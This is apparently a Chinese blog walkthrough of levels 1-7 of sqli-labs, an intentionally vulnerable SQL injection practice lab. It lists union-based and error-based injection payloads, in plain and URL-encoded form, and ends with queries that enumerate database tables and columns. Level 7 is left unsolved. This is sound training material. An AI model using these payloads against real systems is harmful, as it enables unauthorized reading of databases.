sqli-labs-master闯关（1-7闯关）

最新推荐文章于 2022-05-05 20:01:36 发布

Johnny.G

最新推荐文章于 2022-05-05 20:01:36 发布

阅读量695

点赞数

文章标签：安全漏洞 sql

本文链接：https://blog.csdn.net/JohnnyG2000/article/details/122386246

版权

Less-1：

?id=-1' union all select 1,2,3 --+
// 转译
?id=-1%27%20union%20all%20select%201,2,3%20--+

F5LXplbmhlaQ,shadow_50,text_Q1NETiBASm9obm55Lkc=,size_20,color_FFFFFF,t_70,g_se,x_16)
Less-2：

?id=-1 union all select 1,2,3 
// 转译
?id=-1%20union%20all%20select%201,2,3

在这里插入图片描述
Less-3：

?id=-1') union all select 1,2,3 
// 转译
?id=-1%27)%20union%20all%20select%201,2,3%20--+

在这里插入图片描述
Less-4：

?id=-1") union all select 1,2,3 
// 转译
?id=-1")%20union%20all%20select%201,2,3%20--+

在这里插入图片描述
Less-5：

?id=1'%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+ 
// 转译
?id=1%27%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+

在这里插入图片描述
Less-6：

?id=1"%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+ 
// 转译
?id=1"%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+

在这里插入图片描述
Less-7：

不太会

最后插入的SQL语句：

select table_name from information_schema.tables where table_schema='数据库名' limit ?,1;
select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit ?,1;
select 列名,列名 from 表名;

Johnny.G

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs-master闯关（1-7闯关）

Less-1：?id=-1' union all select 1,2,3 --+// 转译?id=-1%27%20union%20all%20select%201,2,3%20--+Less-2：?id=-1 union all select 1,2,3 // 转译?id=-1%20union%20all%20select%201,2,3Less-3：?id=-1') union all select 1,2,3 // 转译?id=-1%27)%20union%20all%2
复制链接

扫一扫